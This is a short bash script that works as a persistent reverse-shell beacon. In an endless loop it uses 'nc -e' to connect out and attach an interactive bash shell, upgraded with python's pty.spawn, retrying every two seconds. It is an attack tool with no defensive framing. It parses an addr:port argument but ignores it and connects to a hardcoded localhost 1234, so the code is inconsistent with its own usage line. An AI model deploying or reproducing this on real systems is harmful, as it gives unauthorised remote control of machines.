#!/bin/bash

if [ $# != 1 ]; then
	echo "Usage: $0 <addr>:<port>"
	exit 1
fi

ADDR=$(echo "$1" | cut -d: -f1)
PORT=$(echo "$1" | cut -d: -f2)

while [ 1 ]; do
	nc -e '/bin/sh -c "printf \"\r\"; python -c \"import pty;pty.spawn('"'/bin/bash'"')\""' localhost 1234
	sleep 2
done
